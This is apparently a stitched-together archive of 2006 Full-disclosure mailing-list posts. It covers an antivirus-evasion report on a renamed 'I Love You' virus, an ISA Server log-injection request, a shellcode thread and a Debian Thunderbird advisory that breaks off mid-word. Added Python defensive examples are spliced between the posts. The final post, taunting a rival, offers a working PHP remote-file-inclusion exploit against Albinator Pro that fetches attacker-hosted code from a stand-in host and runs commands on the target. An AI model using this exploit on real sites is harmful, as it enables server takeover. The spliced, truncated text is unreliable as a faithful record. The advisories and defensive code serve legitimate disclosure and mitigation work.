The virus was sent by: [EMAIL PROTECTED]
(header information removed)

- Juha-Matti
Re: [Full-disclosure] RE: Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
AVG detects it as LoveLetter.
Database: 268.5.3/331
Database Date: 3/5/2006

On 5/4/06, Joxean Koret <> wrote:
> Sorry, the email was sent without the attachment.
> ---
> Regards,
> Joxean Koret
>
> > Attached goes a working "I Love You" virus in which I changed ONLY the variable "dirsystem" with the name "kk2" (The file attached has the extension ".txt.gz"; otherwise, with the .vbs extension, the file will be locked by all the most popular anti-viral toolkits).
>
> Disclaimer:
> ~~~
> The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
> ---
> Contact: Joxean Koret at joxeanpiti@yah00
[Full-disclosure] ISA Server 2004 Log Manipulation
Discovered by: Noam Rathaus using the beSTORM fuzzer.
Reported to vendor: December, 2005.
Vendor response: Microsoft does not consider this issue to be a security vulnerability.
Public release date: 4th of May, 2006.
Advisory URL: http://www.beyondsecurity.com/besirt/advisories/042006-001-ISA-LM.txt

Introduction
There is a Log Manipulation vulnerability in Microsoft ISA Server 2004 which, when exploited, enables a malicious user to manipulate the Destination Host parameter of the log file.

Technical Details
By sending the following request to the server:

GET / HTTP/1.0
Host: %01%02%03%04
Transfer-Encoding: whatever

we were able to insert arbitrary characters, in this case the ASCII characters 1, 2, 3 (respectively), into the Destination Host parameter of the log file.

This was found after 3 days of running the beSTORM fuzzer at 600+ sessions per second while monitoring the ISA Server log file for problems.

About ISA Server 2004
"Microsoft Internet Security and Acceleration (ISA) Server 2004 is the advanced stateful packet and application-layer inspection firewall, virtual private network (VPN), and Web cache solution that enables enterprise customers to easily maximize existing information technology (IT) investments by improving network security and performance."
Product URL: http://www.microsoft.com/isaserver/default.mspx

--
beSIRT - Beyond Security's Incident Response Team
[EMAIL PROTECTED]
www.BeyondSecurity.com
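One defensive handling of the field the advisory describes, as an added example that is not part of the advisory or of ISA Server: the writer escapes control characters instead of putting them in the log raw, a detection rule flags any destination host that carries control characters, and the reader treats a record with the wrong field count as an error rather than data. The sample Host values are constructed, and the assumption that the header is percent-decoded before it reaches the log (consistent with the advisory seeing bytes 1, 2, 3 in the file) is mine.

```python
from urllib.parse import unquote

# Constructed Host header values (not captured from the advisory's fuzzing run).
# The second is the advisory's own request, as the percent-encoded string it shows;
# the third carries CR LF and a tab-separated tail shaped like a second record.
SAMPLE_HOSTS = [
    "www.example.com",
    "%01%02%03%04",
    "www.example.com%0d%0a2006-05-04 00:00:00\t10.0.0.1\tGET\t/forged",
]


def decode_header(value):
    """Percent-decode the header. Assumption: the proxy decodes before logging,
    which is how %01%02%03 would end up as raw bytes 1, 2, 3 in the log."""
    return unquote(value)


def has_control_chars(value):
    """Detection rule: a destination host should never contain control characters."""
    return any(ord(c) < 0x20 or ord(c) == 0x7F for c in value)


def escape_log_field(value):
    """Mitigation: escape every character outside printable ASCII, plus the escape
    character itself, so a field can never contain a line break, a field separator
    or an ambiguous backslash."""
    out = []
    for c in value:
        code = ord(c)
        if c == "\\":
            out.append("\\\\")
        elif 0x20 <= code < 0x7F:
            out.append(c)
        elif code < 0x100:
            out.append("\\x%02x" % code)
        else:
            out.append("\\u%04x" % code)
    return "".join(out)


def log_line(client_ip, method, url, host):
    """One tab-separated record; every field goes through the escaper."""
    fields = (client_ip, method, url, decode_header(host))
    return "\t".join(escape_log_field(f) for f in fields)


def build_sample_log():
    """Log text for the constructed samples, one record per line."""
    return "\n".join(log_line("10.0.0.9", "GET", "/", h) for h in SAMPLE_HOSTS) + "\n"


def parse_log(text):
    """Reader side: with the escaper above every record has exactly four fields,
    so anything else is a malformed record to alert on, not data to trust."""
    records = []
    for line in text.split("\n"):
        if not line:
            continue
        fields = line.split("\t")
        if len(fields) != 4:
            raise ValueError("malformed record: %r" % line)
        records.append(fields)
    return records


def suspicious_hosts(hosts):
    """Return the decoded host values that trip the detection rule."""
    decoded = [decode_header(h) for h in hosts]
    return [h for h in decoded if has_control_chars(h)]


if __name__ == "__main__":
    print(build_sample_log())
    print("suspicious:", suspicious_hosts(SAMPLE_HOSTS))
```

The escaping is reversible (backslash is escaped too), so a forensic reader can recover the original bytes, while a line-oriented log parser can no longer be fed a forged record through a header value.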
[Full-disclosure] Panda Antivirus Enterprise Secure, Norton Antivirus 2005 and the virus "I Love You"
Hi to all!

Trying the latest Panda Antivirus with a friend, we have found that it is unable to detect the old "I Love You" virus after simply changing the name of one variable.

Attached goes a working "I Love You" virus in which I changed ONLY the variable "dirsystem" with the name "kk2" (The file attached has the extension ".txt.gz"; otherwise, with the .vbs extension, the file will be locked by all the most popular anti-viral toolkits).

If you send it to an e-mail server that uses Panda TruePrevent, it will not find any virus. It will be "quarantined" if you send it with the extension ".vbs", obviously, but it will not be detected as a virus. Panda Antivirus Client-Shield will not find anything.

It's supposed that Panda TruePrevent and ClamAV should detect the strings found in the contents of the file and should detect it as a virus.

I found, also, that Norton Antivirus 2005 is unable to detect it.

You can download any old virus that you want, rename one variable and you will have a "0 day virus". Wow! That's fun!

NOTE: ClamAV (ClamAV 0.88.2/1439) detects it.

Disclaimer:
~~~
The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.
---
Contact: Joxean Koret at joxeanpiti@yah00
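The weakness the post demonstrates, as an added example that is not the poster's attachment or any vendor's engine: a literal-substring signature keyed on the author's variable name fails as soon as that name changes, while a signature computed over a token stream in which author-chosen identifiers are abstracted away still matches the renamed copy and still ignores an unrelated script. The VBScript snippets SAMPLE_A, SAMPLE_B and SAMPLE_C are constructed for this demonstration (they copy or write a text file; they are not the virus), and BEHAVIOUR_NAMES is my choice of which names count as behaviour rather than naming.

```python
import re
from hashlib import sha256

# Constructed sample scripts. SAMPLE_B differs from SAMPLE_A only in the name of
# one variable, which is the change the post reports as defeating several scanners.
SAMPLE_A = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'Set dirsystem = fso.GetSpecialFolder(1)\n'
    'fso.CopyFile "readme.txt", dirsystem & "\\readme.txt"\n'
)
SAMPLE_B = SAMPLE_A.replace("dirsystem", "kk2")
# An unrelated script using the same object model: must not match.
SAMPLE_C = (
    'Set fso = CreateObject("Scripting.FileSystemObject")\n'
    'Set f = fso.OpenTextFile("log.txt", 8, True)\n'
    'f.WriteLine "ok"\n'
)

# A literal signature of the kind the post shows breaking: it contains the
# author's variable name, so renaming the variable is enough to evade it.
LITERAL_SIGNATURE = "Set dirsystem = fso.GetSpecialFolder(1)"


def matches_literal(script):
    return LITERAL_SIGNATURE in script


# Names that determine what the script does (keywords, object methods). Every
# other identifier is a name the author chose freely and is replaced by "ID".
BEHAVIOUR_NAMES = {
    "set", "createobject", "getspecialfolder", "copyfile", "opentextfile",
    "writeline", "true", "false",
}
# string literal | identifier | number | any single punctuation/operator char
TOKEN_RE = re.compile(r'"[^"]*"|[A-Za-z_][A-Za-z0-9_]*|\d+|[^\sA-Za-z0-9_"]')


def normalize(script):
    """Tokenize and abstract author-chosen identifiers; keep API names,
    literals, numbers and operators, which carry the behaviour."""
    out = []
    for tok in TOKEN_RE.findall(script):
        if tok[0].isalpha() or tok[0] == "_":
            out.append(tok.lower() if tok.lower() in BEHAVIOUR_NAMES else "ID")
        else:
            out.append(tok)
    return out


def normalized_signature(script):
    """Hash of the normalized token stream: unchanged by identifier renames."""
    return sha256(" ".join(normalize(script)).encode()).hexdigest()


# The "database": the normalized signature of the known sample only.
KNOWN_BAD = {normalized_signature(SAMPLE_A)}


def matches_normalized(script):
    return normalized_signature(script) in KNOWN_BAD


if __name__ == "__main__":
    for name, s in (("A", SAMPLE_A), ("B renamed", SAMPLE_B), ("C benign", SAMPLE_C)):
        print("%-10s literal=%-5s normalized=%s"
              % (name, matches_literal(s), matches_normalized(s)))
```

A production engine adds emulation and partial matching on top of this; the point of the block is only that a signature which rests on a name the author picked is one rename away from useless, whereas one that rests on the calls the script makes is not.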
Re: [Full-disclosure] shellcode study
Erm, what do you mean with "new" documents? The old ones that cover shellcode won't be any different from a "new" document. It's the same techniques there, unless you want polymorphic shellcode. Just look at the Phrack magazine; there you will find papers regarding shellcode.

-sk
http://www.groundzero-security.com

- Original Message -
From: azrael goblin
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, May 04, 2006 11:47 AM
Subject: [Full-disclosure] shellcode study

> hi guys, I am learning to write shellcode now. Can somebody supply some new shellcode documents? btw, if someone needs some, I can supply some old documents. Sorry for my poor eng. thx
>
> your, goblin
[Full-disclosure] shellcode study
hi guys, I am learning to write shellcode now. Can somebody supply some new shellcode documents? btw, if someone needs some, I can supply some old documents. Sorry for my poor eng. thx

your, goblin
[Full-disclosure] [SECURITY] [DSA 1051-1] New Mozilla Thunderbird packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA 1051-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                          Martin Schulze
May 4th, 2006                           http://www.debian.org/security/faq
- --

Package: mozilla-thunderbird
Vulnerability : several
Problem type : remote
Debian-specific: no
CVE IDs: CVE-2005-2353 CVE-2005-4134 CVE-2006-0292 CVE-2006-0293 CVE-2006-0296 CVE-2006-0748 CVE-2006-0749 CVE-2006-0884 CVE-2006-1045 CVE-2006-1529 CVE-2006-1530 CVE-2006-1531 CVE-2006-1723 CVE-2006-1724 CVE-2006-1727 CVE-2006-1728 CVE-2006-1729 CVE-2006-1730 CVE-2006-1731 CVE-2006-1733 CVE-2006-1734 CVE-2006-1735 CVE-2006-1736 CVE-2006-1737 CVE-2006-1738 CVE-2006-1739 CVE-2006-1740 CVE-2006-1741 CVE-2006-1742 CVE-2006-1790
CERT advisories: VU#179014 VU#252324 VU#329500 VU#350262 VU#488774 VU#492382 VU#592425 VU#736934 VU#813230 VU#842094 VU#932734 VU#935556
BugTraq IDs: 15773 16476 16476 16770 16881 17516

Several security related problems have been discovered in Mozilla Thunderbird. The Common Vulnerabilities and Exposures project identifies the following vulnerabilities:

CVE-2005-2353
    The "run-mozilla.sh" script allows local users to create or overwrite arbitrary files when debugging is enabled via a symlink attack on temporary files.

CVE-2005-4134
    Web pages with extremely long titles cause subsequent launches of the browser to appear to "hang" for up to a few minutes, or even crash if the computer has insufficient memory. [MFSA-2006-03]

CVE-2006-0292
    The Javascript interpreter does not properly dereference objects, which allows remote attackers to cause a denial of service or execute arbitrary code. [MFSA-2006-01]

CVE-2006-0293
    The function allocation code allows attackers to cause a denial of service and possibly execute arbitrary code. [MFSA-2006-01]

CVE-2006-0296
    XULDocument.persist() did not validate the attribute name, allowing an attacker to inject arbitrary XML and JavaScript code into localstore.rdf that would be read and acted upon during startup. [MFSA-2006-05]

CVE-2006-0748
    An anonymous researcher for TippingPoint and the Zero Day Initiative reported that an invalid and nonsensical ordering of table-related tags can be exploited to execute arbitrary code. [MFSA-2006-27]

CVE-2006-0749
    A particular sequence of HTML tags can cause memory corruption that can be exploited to execute arbitrary code. [MFSA-2006-18]

CVE-2006-0884
    Georgi Guninski reports that forwarding mail in-line while using the default HTML "rich mail" editor will execute JavaScript embedded in the e-mail message with full privileges of the client. [MFSA-2006-21]

CVE-2006-1045
    The HTML rendering engine does not properly block external images from inline HTML attachments when "Block loading of remote images in mail messages" is enabled, which could allow remote attackers to obtain sensitive information. [MFSA-2006-26]

CVE-2006-1529
    A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20]

CVE-2006-1530
    A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20]

CVE-2006-1531
    A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20]

CVE-2006-1723
    A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20]

CVE-2006-1724
    A vulnerability potentially allows remote attackers to cause a denial of service and possibly execute arbitrary. [MFSA-2006-20]

CVE-2006-1727
    Georgi Guninski reported two variants of using scripts in an XBL control to gain chrome privileges when the page is viewed under "Print Preview". [MFSA-2006-25]

CVE-2006-1728
    "shutdown" discovered that the crypto.generateCRMFRequest method can be used to run arbitrary code with the privilege of the user running the browser, which could enable an attacker to install malware. [MFSA-2006-24]

CVE-2006-1729
    Claus Jørgensen reported that a text input box can be pre-filled with a filename and then turned into a file-upload control, allowing a malicious website to steal any local file whose name they can guess. [MFSA-2006-23]

CVE-2006-1730
    An anonymous researcher for TippingPoint and the Zero Day Initiative discovered an integer overflow triggered by the CSS letter-spa
[Full-disclosure] [XPA] - Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability
===
XOR Crew :: Security Advisory
0day GIVE AWAY (date?) 2/20/2006
===
Albinator Pro <= 2.0.8 - Remote Command Execution Vulnerability
===
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
===
:: Summary
Vendor : Albinator
Vendor Site : http://www.dreamcost.com/
Product(s) : Albinator Pro - Photo Album/Gallery Management System
Version(s) : All
Severity : Medium/High
Impact : Remote Command Execution
Release Date : 2/11/2006
Credits : ReZEN (rezen (a) xorcrew (.) net)
===
I. Description
Albinator is developed in PHP, backed by a lightning-fast database in MySQL. With its unique features, it instantly and automatically organizes your websites' users' digital images into compact digital photo albums ideal for sharing and emailing to friends and family. It automatically generates thumbnails of the photos for easy browsing.
===
II. Synopsis
(0day give away because r0t is stupid)
THIS BUG WORKS FOR ALL VERSIONS OF ALBINATOR!!! (r0t you are a moron, stick to useless XSS exploits please thanks)

There is a remote file inclusion vulnerability that allows for remote command execution in the /essentials/gc.php and in the essentials/integration.inc.php file. The bug is here on lines 2 and 3:

include_once($dirpath . "essential/config.php");
include_once($dirpath . "essential/config_tables.inc.php");

The $dirpath variable is not set prior to being used in the include_once() function. The vendor and support team have been contacted.
===
Exploit code:
-BEGIN-
http://www.xorcrew.net/ReZEN
example:
turl: http://www.target.com/path to albinator/essential/gc.php?dirpath=
hurl: http://www.pwn3d.com/evil.txt?
*/
$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];
$form= ""
."turl:value=\"".$turl."\">"
."hurl:value=\"".$hurl."\">"
."cmd:value=\"".$cmd."\">"
.""
."";
if (!isset($_POST['submit'])) {
    echo $form;
}else{
    $file = fopen ("test.txt", "w+");
    fwrite($file, "");
    fclose($file);
    $file = fopen ($turl.$hurl, "r");
    if (!$file) {
        echo "Unable to get output.\n";
        exit;
    }
    echo $form;
    while (!feof ($file)) {
        $line .= fgets ($file, 1024)."";
    }
    $tpos1 = strpos($line, "++BEGIN++");
    $tpos2 = strpos($line, "++END++");
    $tpos1 = $tpos1+strlen("++BEGIN++");
    $tpos2 = $tpos2-$tpos1;
    $output = substr($line, $tpos1, $tpos2);
    echo $output;
}
?>
--END--
===
IV. Greets :>
All of xor, Infinity, stokhli, ajax, gml, cijfer, D2K.
===
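The fix pattern for the bug class the advisory describes, as an added example in Python rather than the project's PHP (this is not Albinator's code): the directory prefix is a constant in the program instead of a variable that request input can populate, and any file name that does still arrive from outside is resolved against that base and rejected if it carries a URL scheme, is absolute, or climbs out of the base directory. BASE_DIR is a hypothetical install location, and vulnerable_include_path only mirrors the concatenation the advisory quotes so the two behaviours can be compared side by side.

```python
import os
from urllib.parse import urlsplit

# Hypothetical install location; not a path taken from the advisory.
BASE_DIR = "/srv/www/albinator/essential"


class IncludeRejected(ValueError):
    """Raised when an include path fails validation."""


def vulnerable_include_path(params):
    """Mirrors the pattern in the advisory: the prefix comes from request input
    (register_globals-style), so a caller can put a URL in front of the file name."""
    return params.get("dirpath", "") + "essential/config.php"


def resolve_include(base_dir, requested):
    """Return an absolute path under base_dir, or raise IncludeRejected.
    Rejects URL schemes (remote inclusion and php:// or data: wrappers),
    absolute paths, and relative paths that escape base_dir."""
    if not requested:
        raise IncludeRejected("empty include path")
    if urlsplit(requested).scheme:
        raise IncludeRejected("URL scheme not allowed: %r" % requested)
    if os.path.isabs(requested):
        raise IncludeRejected("absolute path not allowed: %r" % requested)
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested))
    # realpath collapses "..", so a traversal shows up as a target outside base.
    if os.path.commonpath([base, target]) != base:
        raise IncludeRejected("path escapes %s: %r" % (base, requested))
    return target


def hardened_include_path(params):
    """The prefix is fixed in code; the request parameters are deliberately
    ignored, so nothing from the client reaches the include."""
    return resolve_include(BASE_DIR, "config.php")


def is_accepted(base_dir, requested):
    """True if resolve_include accepts the path, False if it rejects it."""
    try:
        resolve_include(base_dir, requested)
        return True
    except IncludeRejected:
        return False


if __name__ == "__main__":
    evil = {"dirpath": "http://www.pwn3d.com/evil.txt?"}
    print("vulnerable:", vulnerable_include_path(evil))
    print("hardened:  ", hardened_include_path(evil))
    for candidate in ("config.php", "sub/x.php", "../../etc/passwd",
                      "/etc/passwd", "http://www.pwn3d.com/evil.txt?", "php://filter"):
        verdict = "accept" if is_accepted(BASE_DIR, candidate) else "reject"
        print("%-32s %s" % (candidate, verdict))
```

In the PHP deployment itself the same two controls apply: initialise the prefix before the include and run with allow_url_include off, so that even an unset variable cannot be turned into a remote fetch.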